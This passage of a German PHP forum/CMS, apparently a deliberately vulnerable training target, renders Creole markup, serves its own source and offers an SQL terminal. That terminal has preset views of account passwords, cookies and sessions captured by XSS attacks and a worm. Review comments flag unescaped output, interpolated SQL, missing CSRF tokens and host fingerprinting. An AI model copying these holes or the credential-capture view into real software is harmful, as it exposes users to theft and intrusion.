<tr><td colspan='5'><small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='$taz'>".preg_replace($phtml[0],$phtml[1],$line['message'])."</textarea><br />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='edit' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.forms[0].message.focus()//--></script>";
}
}
// Without an "edit" parameter nothing is rendered here; the request falls back to the default page.
else
$request = '';
}
}
elseif(preg_match('/Admin|Backup/',$request))
$request = '';
# Content-Management-System
if((($request == 'CMS' or isset($_REQUEST['request']) and $_REQUEST['request'] == 'CMS') and $uid) and ($status/2%2 or $status%2 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where id like '$id' or name like '".$sql['es'](trim($q))."'") == 2)) {
if(count($_POST) and !isset($_POST['stop'])) {
$post = array('name' => '\w.-', 'content' => '^\x00');
if($status/2%2)
$post = array_merge($post,array('description' => '^\n', 'menu' => '\d', 'public' => '\d', 'right' => '\d-', 'id' => '\d', 'create' => '\d', 'change' => '\d'));
foreach($post as $key => $var)
$post[$key] = (isset($_POST[$key]) and preg_match('/['.$var.']+/',$_POST[$key],$val)) ? strtr($val[0],$html) : false;
if(isset($_POST['save']) and $_POST['save'] and isset($_POST['name']) and !preg_match("/^\s*$ncms\s*$/",$_POST['name'])) {
if($status/2%2)
$var = (int)$post['right']*2 + ((isset($post['menu'])) ? $post['menu'] : 0) + ((isset($post['public'])) ? $post['public']*8 : 0);
if($id)
$sql['e']($conn,"
update [cms] set
change=datetime('now','localtime'),
changes=changes+1,".(($status/2%2) ? "
status=$var,
name='$post[name]',
description=nullif('".$sql['es']($post['description'])."','')," : "")."
content=nullif('".$sql['es']($post['content'])."','')
where id = $id");
elseif($status/2%2)
$sql['e']($conn,"
insert into [cms] ([create],[change],[status],[name],[description],[content])
values( datetime('now','localtime'),datetime('now','localtime'),
$var,
'$post[name]',
nullif('".$sql['es']($post['description'])."',''),
nullif('".$sql['es']($post['content'])."',''))");
$id = $content = true;
$request = ($post['name'] != '') ? "$post[name] " : ' ';
}
elseif(isset($_POST['remove']) and $id and $status/2%2) {
$sql['e']($conn,"delete from [cms] where id = $id");
$id = $post = false;
}
}
else
$post = false;
if(!$id and $q !== false)
$id = $sql['sq']($conn,"select id from [cms] where name like '".$sql['es']($q)."'");
if(!$post and $id and $var = $sql['aq']($conn,"
select id,
name,
strftime('%s',change) as change,
strftime('%s',[create]) as 'create',
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
content
from [cms]
where id = $id",SQLITE_ASSOC))
$post = reset($var);
elseif(!$post)
$post = array('id' => 0, 'name' => '', 'menu' => 0, 'public' => 0, 'right' => -2, 'description' => '', 'content' => '', 'create' => '', 'change' => '');
if(count($_POST) and $post['content'] != '' and $creolevar = array_merge($creolevar,array('type' => 'cms', 'id' => $post['id'], 'name' => $post['name'], 'create' => $post['create'],
'change' => $post['change'], 'name' => $post['name'], 'title' => $post['description'], 'right' => $post['right'], 'from' => $sql['sq']($conn,'select username from user where status/2%2 = 1'))))
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($post['content'],array_slice($html,1)))."</div>";
if($id or isset($post['id']))
$uedit = "CMS?id=".((isset($post['id'])) ? $post['id'] : $id);
if($id === false) {
$num = $sql['sq']($conn,"select count(*) from [cms]");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/CMS?page=#key##max#".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
if($rows = $sql['aq']($conn,"
select id,
name,
[create],
change,
changes,
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
strftime('%d.%m.%Y %H:%M:%S',[create]) as erstellt,
strftime('%d.%m.%Y %H:%M:%S',change) as modifiziert
from [cms]".preg_replace($sorth[2],$sorth[3],"name;9;name")."
limit $val,$max")) {
$row = array();
foreach($rows as $var)
$row[] = "<tr><td><a href='$self/CMS?id=$var[id]'>$var[id]</a></td><td><a href='$self".(($var['name'] == '') ? "'>Startseite" : "/$var[name]'>$var[name]" )."</a></td><td>$var[erstellt]</td><td>$var[modifiziert]</td><td align='center'>$var[changes]</td><td align='center'>".strtr($var['menu'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['public'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['right'],array(0 => 'Jeder' , 1 => 'Benutzer', 2 => 'Benutzer+', 3 => 'Admin'))."</td><td>".strtr($var['description'],array_slice($html,1))." </td></tr>";
$out .= "$info[8]<fieldset><legend><b>Übersichtsliste für Content-Management-System</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"ID=1\tSeite=2\tErstellt=3\tZuletzt Geändert=4\tGeändert=5\tMenü=6\tÖffendlich=7\tRechte=8\tBeschreibung=9")."</tr>".implode("",$row)."</table><div align='right'><a href='$self/CMS?id=0'>Neue Seite erstellen</a></div><h4 align='center'>$code</h4></fieldset>";
}
}
elseif($id === false)
$id = 0;
if(isset($_POST['stop'])) {
$id = $content = true;
$request = ($post['name'] != '') ? $post['name'] : ' ';
}
if($id !== false and $id !== true) {
if($status/2%2) {
$array = array(3 => 'Admin (Voll)', 2 => 'Benutzer (Edit)', 1 => 'Benutzer (Lesen)', 0 => 'Jeder (Lesen)');
foreach($array as $key => $var)
$array[$key] = "<option value='$key'".(($post['right'] == $key) ? " selected" : "").">$var</option>";
}
if(isset($_POST['content']) and $_POST['content'] != '')
$out .= '<br />';
$out .= "<a name='edit'></a><form action='$self/CMS?id=$id' method='post' name='cms'><fieldset class='cr'><legend><b>Content-Management-System</b> <small>(<a href='#edit'>edit</a>)</small></legend><table width='100%' border='0'>".(($status/2%2) ? "<tr><td width='20%'>
<small>Seite:</small><br /><input type='text' name='name' value='$post[name]' style='width:100%' /></td><td width='70%'>
<small>Beschreibung:</small><br /><input type='text' name='description' value='".strtr($post['description'],array_slice($html,1))."' style='width:100%' /></td><td width='5%' nowrap>
<small>Optionen:</small><br /><input type='checkbox' name='menu' id='menu' value='1'".(($post['menu'] > 0) ? " checked" : "")." /><label for='menu'>Menü</label>
<input type='checkbox' name='public' id='public' value='1'".(($post['public'] > 0) ? " checked" : "")." /><label for='public'>Öffendlich</label></td><td width='5%'>
<small>Rechte:</small><br /><select name='right' size='1'>".implode('',$array)."</select></td></tr>" : "<input type='hidden' name='name' value='$post[name]' />")."<tr><td colspan='4'>
<small>Nachricht:</small><br /><textarea style='width:100%' name='content' cols='80' rows='$taz'>$post[content]</textarea><br />
<input type='hidden' name='id' value='$post[id]' />
<input type='hidden' name='create' value='$post[create]' />
<input type='hidden' name='change' value='$post[change]' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> ".(($status/2%2) ? "<input type='submit' name='remove' value='Löschen' onclick='return confirm(\"Wirklich Löschen?\")' /> " : "")."<input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.cms.".(($post['content']) ? 'content' : 'name').".focus();//--></script>";
}
}
}
}
# Render the Creole syntax legend (sample markup next to its rendered form) and prepend it to $out.
# Shown for Admin/Beitrag/Bearbeiten requests, or for a CMS request carrying ?id or ?q and no
# `remove`, provided $uid or $gast is set; also shown on the Creole page unless `nodemo` is present.
# `and` binds tighter than `or`, so the test reads ((A or B) and ($uid or $gast)) or (Creole and !nodemo).
if((preg_match('/Admin|Beitrag|Bearbeiten/',$request) or $request == 'CMS' and (isset($_GET['id']) or isset($_GET['q'])) and !isset($_REQUEST['remove']))
and ($uid or $gast) or $request == 'Creole' and !isset($_REQUEST['nodemo'])) {
// Mark the render context as 'intern'; how the $creole rules use it is outside this view.
$creolevar = array_merge($creolevar,array('type' => 'intern'));
// Hard-coded sample snippets, one per markup feature; none of this is request data.
$val = array("**Fett**","//Kursiv//","++Größer++","--Kleiner--","~~Durchgestrichen~~","__Unterstrichen__",
"##Druckschrift##","^^Hoch^^ gestellt",",,Tief,, gestellt","**//__Kombiniert__//**","@@**Fett** ~//Code//@@",
"===Überschrift 3","* List\n** Unter\n* Punkt","# List\n## Unter\n# Zahl","; List\n: Info\n;; Rekursiv\n:: Info",
"[[[Einfacher\nUmbruch]]]","Um\\\\bruch aus~\\\\setzen","^CMS CreoleLink","http://www.xx","mail@www.xx",
"[[http://www.xx|title]]","[[back->http://www.xx]]"," Plaintext","----","{{/favicon.ico|Ikone}}","{{{**//Plain//**}}}",
"??key:value?? / ??key??","<<echo str='foo bar'>>",". <<<_ nix>>> /* nix */","|>\n|=Tabelle|=Titel|\n|Spalte |Zelle |");
// Left cell: the sample passed through $html minus its first entry (presumably an HTML-escape map - confirm)
// so it displays literally. Right cell: the same sample run through the $creole pattern/replacement pairs.
// '@' hides any warning preg_replace() raises for those rules.
foreach($val as $key => $var)
$val[$key] = "<tr><td><pre>".strtr($var,array_slice($html,1))."</pre></td><td>".str_replace("\n",'<br />',@preg_replace(array_keys($creole),array_values($creole),$var))."</td></tr>";
// Build the legend and put it in front of whatever $out already holds (note the trailing $out).
// The inline scripts are run through the $js patterns first (presumably whitespace/comment stripping - confirm).
// The click handlers show/hide the tables and store the choice in bit 1 of a `hide` cookie scoped to path=$self.
// NOTE(review): $self is placed inside inline JavaScript and single-quoted attributes without escaping here;
// verify it is server-derived and cannot carry quote characters.
// NOTE(review): setsmile handlers are built by concatenating each image's alt text into script source;
// the alt values are expected to come from the fixed smiley table - confirm they cannot contain a double quote.
$out = "<table align='right' id='crs' style='display:none'><tr><td><a href='#' title='Tabelle einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'block';
document.getElementById('crs').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 0 : 0) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>«</a></td></tr></table>
<table align='right' border='1' class='cr' id='crh'><tr><td colspan='2'>
<table align='right' cellpadding='0' cellspacing='0' style='display:none' id='cra'><tr><td><a href='#' title='Tabelle ausblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'none';
document.getElementById('crs').style.display = 'block';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 1 : 1<<1) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>»</a></td></tr></table>
<a href='http://www.wikicreole.org/wiki/PressReleaseGerman'$tgb><b>Forumschreibweise:</b></a></td></tr>".implode('',$val)
.(($img) ? "<tr><td colspan='2'>".@preg_replace(array_keys($creole),array_values($creole),
"**Smilie-Codes:**\n<table width='100%' cellpadding='0' cellspacing='0' id='smile'><tr><td valign='bottom'><small>
:D @@~:-D ~;-D ~:D ~;D@@
8) @@~8-) ~B-) ~8) ~B)@@
8O @@~8-O ~8-o ~8O ~8o@@</small></td><td valign='bottom'><small> :) @@~:-) ~:)@@
;) @@~;-) ~;)@@
8| @@~8-| ~8|@@</small></td><td valign='bottom'><small> ~~ @@~~-~~ ~~@@</small></td></tr><tr><td valign='top'><small> :( @@~:-( ~;-( ~:( ~;(@@
:| @@~:-| ~;-| ~:| ~;|@@
:? @@~:-? ~;-? ~:? ~;?@@</small></td><td valign='top' colspan='2'><small> :C @@~:-C ~;-C ~:-c ~;-c ~:C ~;C ~:c ~;c@@
:O @@~:-O ~;-O ~:-o ~;-o ~:o ~;o ~:O ~;O@@
:x @@~:-x ~;-x ~:-X ~;-X ~:x ~;x ~:X ~;X@@</small></td></tr><tr><td colspan='3' valign='top'><small> :P @@~:-P ~;-P ~:-p ~;-p ~:-b ~;-b ~:P ~;P ~:p ~;p ~:b ~;b@@</small></td></tr></table>")."</td></tr>" : "")."</table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('cra').style.display = 'block';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2]&(1<<1)))
document.getElementById('crh').style.display = 'none',
document.getElementById('crs').style.display = 'block';".(($img) ? "
var a,s = document.getElementById('smile').getElementsByTagName('img');
for(a = 0; a < s.length; a++)
s[a].setAttribute('onclick','setsmile(\" ' + s[a].alt + '\")');
function setsmile(s) {
if((a = document.getElementsByTagName('body')[0].getElementsByTagName('textarea'))) {
if(document.selection)
document.selection.createRange().text = s;
else
if(a[0].selectionStart || a[0].selectionStart == '0')
a[0].value = a[0].value.substring(0,a[0].selectionStart) + s + a[0].value.substring(a[0].selectionEnd,a[0].value.length);
else
a[0].value += s;
a[0].focus();
}
}" : ""))."//--></script>$out";
}
# Creole live demo: preview the submitted markup and show the editor form.
# Reachable only with $leak enabled or for a logged-in user ($uid); any other
# visitor is sent to the imprint page by rewriting $request.
if ($request == 'Creole') {
    if ($leak || $uid) {
        $creolevar['type'] = 'cms';
        // $var carries the submitted text (or '') into the textarea below.
        $var = isset($_POST['source']) ? $_POST['source'] : '';
        if (isset($_POST['source'])) {
            // Preview: the text goes through $html minus its first entry, then through the Creole rules.
            // '@' hides any warning preg_replace() raises for those rules.
            $out .= "<fieldset class='cr'><legend><b><a href='#edit'>Creole Ansicht:</a></b></legend>"
                . @preg_replace(array_keys($creole), array_values($creole), strtr($var, array_slice($html, 1)))
                . "</fieldset><br />";
        }
        // Editor form; the textarea content is passed through the complete $html map.
        $out .= "<a name='edit'></a><form action='$self/$request' method='post'><fieldset><legend><b>Creole Livedemo</b> <small><a href='#edit'>(edit)</a></small></legend>
<small>Quelltext:</small><br /><textarea style='width:100%' name='source' cols='80' rows='$taz'>" . strtr($var, $html) . "</textarea><br />
<input type='submit' name='test' value='Anzeigen' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' />";
        // The "no legend" switch needs the debug cookie plus either $leak mode or the admin bit ($status/2%2).
        if (($leak || $status/2%2) && isset($_COOKIE['debug']) && $_COOKIE['debug']) {
            $out .= " <input type='checkbox' name='nodemo' id='nodemo' ";
            $out .= isset($_REQUEST['nodemo']) ? " checked" : "";
            $out .= "> <label for='nodemo'><small>Keine Legende erstellen</small></label>";
        }
        $out .= "</fieldset></form><script type='text/javascript'><!--
document.forms[0].source.focus();//--></script>";
    } else {
        $request = 'Impressum';
    }
}
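# Source viewer. With a numeric ?q it shows the raw text of one forum message;
# otherwise it serves this script's own source as a gzip download, as plain
# text, or as highlighted HTML. No login check guards the script-source branch,
# so anything hard-coded in this file is readable by every visitor.
if (preg_match('/^source(?:\.(txt|html|php\.gz))?$/i', $request, $val)) {
    // Message view: only the first run of digits in $q reaches the SQL text.
    // Without the admin bit ($status/2%2) the row must be visible to the caller and,
    // if it is mail, addressed to or written by $uid (or be a blog entry: mailid = userid).
    // NOTE(review): '$uid' is interpolated as a quoted literal; presumably it is the
    // numeric session user id - confirm where it is set.
    if ($sql and $q and preg_match('/\d+/', $q, $var) and $line = $sql['aq']($conn, "
select strftime('%d.%m.%Y %H:%M:%S',f.[create]) as datum,
userid,
mailid,
username,
title,
message
from [forum] as f
left join [user] as u on f.userid = u.id
where f.id=$var[0]".(($status/2%2) ? '' : " and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
and (f.mailid is null or f.mailid = ifnull('$uid',null) or f.mailid is not null and f.userid = ifnull('$uid',null) or f.mailid = f.userid)"), SQLITE_ASSOC)) {
        // Title and message are passed through $html (minus its first entry) before output.
        // NOTE(review): username is emitted without that step - confirm whether registration
        // restricts its characters or whether this is one of the forum's intended exercises.
        $out .= "<fieldset><legend><a href='$self".(($line[0]['mailid']) ? "/Mail" : "")."?q=$var[0]'>".((is_null($line[0]['title'])) ? "<em>Ohne Titel</em>"
            : "<b>".strtr($line[0]['title'],array_slice($html,1))."</b>")."</a> von "
            .((is_null($line[0]['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=".$line[0]['userid']."'>".$line[0]['username']."</a>")
            ." vom ".$line[0]['datum']."</legend><pre style='white-space:pre-wrap'>".strtr($line[0]['message'],array_slice($html,1))."</pre></fieldset>";
    }
    else {
        // Guarantee that $val[1] exists when the request carried no extension.
        $val[] = '';
        $lines = file(__FILE__);
        if (isset($_GET['download']) or $val[1] == 'php.gz') {
            // Compressed download; $gz['encode'] is presumably a gzip encoder - defined outside this view.
            header("Content-Type: application/octet-stream");
            // A Content-Disposition value needs a disposition type in front of the filename parameter.
            header('Content-Disposition: attachment; filename="'.basename(__FILE__).'.gz"');
            die($gz['encode'](implode('', $lines), 9));
        }
        elseif (strtolower($request) == $request and $val[1] != 'html' or $val[1] == 'txt') {
            // "8859-1" alone is not a recognised charset label; spell out iso-8859-1.
            header('Content-Type: text/plain; charset=iso-8859-1');
            die(implode('', $lines));
        }
        else {
            // Expand every tab to the next 8-column stop before highlighting.
            foreach ($lines as $key => $var) {
                while (false !== $tab = strpos($lines[$key], "\t")) {
                    $lines[$key] = substr($lines[$key], 0, $tab).str_repeat(' ', 8-$tab%8).substr($lines[$key], $tab+1);
                }
            }
            $out .= "<pre style='white-space:pre-wrap'>".strtr(highlight_string(implode('',$lines),true),array(' ' => ' ', "\r" => '', "\n" => ''))."</pre>";
        }
    }
}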
if($sql) {
# SQLite terminal with optional preset queries over the data collected by the XSS attacks.
# Access: the request must be 'SQL' and one of these must hold: ($leak and $query), $info[3] != '',
# or the admin bit ($status/2%2). `and` binds tighter than `or` inside the first parenthesis.
# NOTE(review): with $leak on and $query set, the preset result tables below (captured accounts,
# cookies and sessions) are shown without the admin bit. $query is defined outside this view.
if(($leak and $query or $info[3] != '' or $status/2%2) and $request == 'SQL') {
$val = '';
$q = false;
if($leak) {
// Preset name: first \w+ run of $query, else the posted `preset` value.
// $set is only compared against fixed names below; it is never placed into the SQL text.
$set = (preg_match('/\w+/',$query,$var)) ? $var[0] : ((isset($_POST['preset'])) ? $_POST['preset'] : '');
if($set == "worm")
$q = "
select *
from [worm]
order by id desc
limit 0,25";
// The pattern is unanchored, so any value containing "cookie" or "account" selects this query;
// the column list and grouping then depend on exact equality with 'account' / 'cookie'.
elseif(preg_match('/(cookie|account)/',$set))
$q = "
select x.id as ID,
i.hits as Hits,
strftime('%d.%m.%Y %H:%M:%S',[create]) as 'Datum/Zeit',
href as Url,".(($set == 'account') ? "
user as Username,
pass as Password," : "
sess as Session,
data as Cookie,")."
useragent as UserAgent
from [xss] as x
inner join ( select max(id) as id,
count(*) as hits
from [xss]".(($set == 'account') ? "\n\twhere user is not null and pass is not null" : "")."
group by ".(($set == 'cookie') ? "sess,data" : "user,pass")."
) as i on i.id = x.id
order by x.id desc
limit 0,25";
// Preset drop-down; keys and labels are fixed strings.
$array = array(
'account' => 'Accountdaten',
'cookie' => 'Cookies und Sessions',
'worm' => 'Daten vom Wurm',
'sqlite' => 'SQLite Mastertabelle');
foreach($array as $key => $var)
$array[$key] = "<option value='$key' ".(($query == $key or isset($_POST['preset']) and $_POST['preset'] == $key) ? " selected" : "").">$var</option>";
$val = "<select name='preset' size='1' onChange='this.form.submit()'><option value=''>Preset-Querys:</option>".implode("",$array)."</select>";
}
// Free-form part: only with the admin bit or a non-empty $info[3] (meaning of $info[3] is outside this view).
if($status/2%2 or $info[3] != '') {
if($leak and $set == 'sqlite')
$q = "select * from $sql[m]";
// Table drop-down with a row count per table. The names come from the schema table $sql[m] and are
// placed into HTML and into `select count(*) from [...]` as they are; whoever can run SQL here controls them.
$array = $sql['sq']($conn,"select name from $sql[m] where type = 'table'");
foreach($array as $key => $var)
$array[$key] = "<option value='$var'".((isset($_POST['table']) and isset($_POST['query']) and $_POST['table'] == $var and $_POST['query'] == '') ? " selected" : '').">$var (".$sql['sq']($conn,"select count(*) from [$var]").")</option>";
$val = "<select name='table' size='1' onChange='".preg_replace($js,'',"
if(this.form.query.value == \"\")
this.form.submit();
else {
this.form.query.value += \"[\" + this.value + \"]\";
this.value = \"\";
this.form.query.focus();
}")."'><option value=''>Tabellen:</option>".implode("",$array)."</select> $val";
// Query source, in order: a preset chosen above, the posted `query` text, an uploaded file read through
// $gz['file'], or "select * from [table]" with the posted table name reduced to \w characters.
// The posted or uploaded text is executed as submitted; the access condition above is the only guard.
if(!$q and isset($_POST['query']) and $_POST['query'] != "")
$q = $_POST['query'];
else
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name']))
$q = implode('',$gz['file']($_FILES['file']['tmp_name']));
if(!$q and isset($_POST['table']) and $_POST['table'] != '')
$q = "select * from [".preg_replace('/\W/','',$_POST['table'])."]";
// The query text is echoed into the textarea through the full $html map. Replaces $out instead of appending.
// NOTE(review): the form built here has no per-request token field; whether the handler verifies the
// request origin some other way is outside this view.
$out = "$info[8]<form name='sql' action='$self/SQL' method='post' enctype='multipart/form-data'><fieldset><legend><b>SQLite-Query-Tool (<a href='$self/Backup' title='Backup'>$base</a>)</b></legend>
<small>Datenbankabfrage</small><br /><textarea name='query' rows='16' cols='80' style='width:100%' onChange='this.form.preset.value=\"\"'>".strtr($q,$html)."</textarea><br />
<input type='submit' value='Ausführen' title='Mit Ergebnistabelle' />
<input type='submit' name='exec' value='Daten Update' title='Ohne Ergebnistabelle' />
<input type='reset' value='Zurücksetzen' onDblClick='this.form.query.value=\"\";this.form.preset.value=\"\";' title='Eingabe löschen' /> <input type='file' name='file' title='Komprimierten Query hochladen' />$val</fieldset></form><script type='text/javascript'><!--
document.sql.query.focus();//--></script>";
}
// Run the query. $sql['e'] is used only when `exec` was posted by an admin / $info[3] holder,
// otherwise $sql['q']. '@' suppresses driver warnings; failures are reported through $sql['le'] below.
if($q)
if($result = (isset($_POST['exec']) and ($status/2%2 or $info[3] != '')) ? @$sql['e']($conn,$q) : @$sql['q']($conn,$q)) {
// No tabular result: print the value of $sql['c'] (presumably the changed-row count - confirm).
if((!is_object($result) and $var = $sql['c']($conn)) or is_object($result) and !$sql['nf']($result) or (is_bool($result) or !$sql['nf']($result)))
$out .= "<p>Es wurden ".preg_replace('/^0$/','keine',$var)." Einträge geändert!</p>";
else {
// Result table: column names and cell values go through $html; NULL and '' get placeholders.
$line = '';
for($a=0;$a<$sql['nf']($result);$a++)
$line .= "<td><b>".strtr($sql['fn']($result,$a),$html)."</b></td>";
$line = array("<tr>$line</tr>");
while($row = $sql['fa']($result,SQLITE_NUM)) {
$var = '';
for($a=0;$a<count($row);$a++)
$var .= "<td>".((is_null($row[$a])) ? "<font color='gray' ><i>NULL</i></font>" : (($row[$a] === '') ? " " : preg_replace('/[\r\n]+/','<br />',trim(strtr($row[$a],$html)))))."</td>";
$line[] = "<tr>$var</tr>";
}
if(count($line) > 1)
$out .= "<p>Es befinden sich ".number_format(count($line)-1,0,'','.')." Einträge in der Tabelle!</p><table border='1'>".implode('',$line)."</table><br />";
}
}
else
// NOTE(review): the error text from $sql['ers'] is printed without escaping; presumably a fixed
// driver message per error code - confirm it cannot echo parts of the query.
if(@$sql['le']($conn) != 0)
$out .= "<p><b>Abfrage fehlgeschlagen</b>: ".@$sql['ers'](@$sql['le']($conn))."</p>";
// Footer shown to everyone who reaches this block: library version and charset from $sql, php_uname(),
// PHP version and SAPI name - host fingerprinting detail on the page.
$out .= "<address>SQLite ".$sql['lv']()." ".php_uname()." (PHP ".phpversion()."/".php_sapi_name().") - Charset: ".$sql['lc']()."</address><!---->";
}
# Forum post form: quotes the referenced post (if any), shows a preview of the submitted draft
# and renders the editor. Requires a logged-in user or guest write access ($gast), plus $rw.
if($request == 'Beitrag' and ($uid or $gast) and $rw) {
// A posted id is accepted only if it consists of digits.
if(!$id and isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$var))
$id = $var[0];
// Load the referenced post. Mail rows are returned only when addressed to $uid.
// NOTE(review): $id (when it was set before this block) and $uid are interpolated as they are;
// their validation lies outside this view - confirm both are numeric.
if($id and ($var = $sql['aq']($conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.title as title,
f.message as message,
f.status,
ifnull(f.status%2,'-1') as right,
u.status,
u.username as username,
f.userid as userid,
f.mailid as mailid
from [forum] as f
left join user as u on f.userid = u.id and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and u.status is not null
where f.id = $id and (f.mailid is null or f.mailid = nullif('$uid',''))
limit 1"))) {
$var = reset($var);
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'create' => $var['create'], 'right' => $var['right'], 'from' => $var['username']));
// Quote box, only while no draft was posted. Title and message pass through $html (minus its first
// entry) before the smiley / Creole rules; username is printed as stored.
if(!isset($_POST['message']))
$out .= "<fieldset class='cr'><legend>(<a href='#edit'>$var[id]</a>) "
.((is_null($var['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),strtr($var['title'],array_slice($html,1)))."</b>")
." <small>(Erstellt: $var[crdatum]".(($var['create'] != $var['change']) ? " / <span title='Änderungen: $var[changes]'>Geändert: $var[chdatum]</span>" : '')
.(($var['userid'] != $var['mailid']) ? " von ".((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=$var[userid]'>$var[username]</a>") : '')
.")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($var['message'],array_slice($html,1)))."</fieldset><br />";
}
else
$var = array('id' => '');
// Field values for the form: posted text wins over the loaded post. Both pass through the $phtml
// pattern/replacement pair (presumably escaping for form fields - defined outside this view).
// The stored message is reused only for a blog entry (mailid === userid).
$val = preg_replace($phtml[0],$phtml[1],((isset($_POST['title'])) ? $_POST['title'] : ((isset($var['title'])) ? $var['title'] : "")));
$line = preg_replace($phtml[0],$phtml[1],((isset($_POST['message'])) ? $_POST['message'] : ((count($var) > 1 and $var['mailid'] === $var['userid']) ? $var['message'] : '')));
// Recipient: request parameter first, then the loaded post; $wrt is only compared below, never put into SQL.
if(isset($_REQUEST['mail']))
$wrt = $_REQUEST['mail'];
elseif(isset($var['mailid']))
$wrt = $var['mailid'];
else
$wrt = false;
// Draft preview: the message goes through the full $html map before the Creole rules.
// NOTE(review): the author's tagline is printed here as stored, while the recipient tagline further
// down is escaped when $leak is off - confirm the difference is intended.
// NOTE(review): for a guest ($gast set, $uid empty) the tagline query ends in "where id = ";
// how $sql['sq'] treats the failing statement is outside this view.
if(isset($_POST['message']))
$out .= "<fieldset class='cr'><legend><b><a href='#edit'>Vorschau:</a></b> "
.((isset($_POST['title']) and $_POST['title'] == '') ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),$val)."</b>")
." <small>(".$sql['sq']($conn,"select tagline from user where id = $uid")
.")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($_POST['message'],$html))."</fieldset><br />";
// Recipient list: all users with a non-null status, the current user sorted first.
$usr = $sql['aq']($conn,"
select u.id as id,
u.username as username
from [user] as u
left join [user] as s on u.id = s.id and s.id ".(($uid) ? "= $uid" : "is null")."
where u.status is not null
order by s.id desc,u.username");
// Usernames are written into the option labels as stored.
foreach($usr as $k => $v)
$usr[$k] = "<option value='$v[id]'".((isset($var['mailid']) and !is_null($var['mailid']) and $var['userid'] == $v['id'] or isset($_REQUEST['mail']) and $_REQUEST['mail'] == $v['id'] or isset($_REQUEST['blog']) and $v['id'] == $uid) ? " selected": "").((isset($var['userid']) and $v['id'] == $var['userid']) ? " style='font-weight:bold'" : "").">".(($uid == $v['id']) ? "Blog von" : "Mail an").": $v[username]</option>";
// Recipient name and tagline for the legend. Only the first digit run of `mail` reaches the SQL text.
// With $leak on the tagline is kept raw; otherwise it passes through $html minus its first entry.
$k = (isset($_REQUEST['mail']) and preg_match('/\d+/',$_REQUEST['mail'],$v) and $k = $sql['aq']($conn,"select username,tagline from [user] where id=$v[0]")) ? array($k[0]['username'],(($leak or is_null($k[0]['tagline'])) ? $k[0]['tagline'] : strtr($k[0]['tagline'],array_slice($html,1)))) : false;
// Editor form. Hidden fields carry the post id, the current max(id) of [forum] and the mode.
// NOTE(review): no per-request token field is part of this form; whether the save handler verifies
// the request origin some other way is outside this view.
$out .= "<a name='edit'></a><form action='$self/$request".(($var['id'] != '') ? "?q=$var[id]" : "")."' method='post'><fieldset><legend><b>Neuen Beitrag ".(($k) ? "an $k[0] " : "")."verfassen</b>"
.(($k and !is_null($k[1])) ? " (<small id='tl'>$k[1]</small>)" : "")." <small>(<a href='#edit'>edit</a>)</small></legend>
<small>Titel:</small><br /><input type='text' name='title' value='$val' style='width:100%' /><br />
<small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='$taz'>$line</textarea><br /><input type='hidden' name='id' value='$var[id]' />
<input type='hidden' name='max' value='".$sql['sq']($conn,'select max(id) from [forum]')."' />
<input type='hidden' name='mode' value='".(($wrt == $uid) ? 'Blog' : (($wrt) ? 'Mail' : ''))."' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' /> <select name='mail' size='1'><option value=''>Beitrag ins Forum</option>".implode("",$usr)."</select>"
.(($status%2) ? " <select name='right' size='1'><option value='0'>Für alle Sichtbar</option><option value='1'".((isset($_POST['right']) and $_POST['right'] == 1 or isset($_REQUEST['mail']) and $_REQUEST['mail'] and $_REQUEST['mail'] != $uid or isset($var['f.status']) and $var['f.status']%2 == 1) ? " selected" : "").">Nur für Benutzer</option></select>" : "")
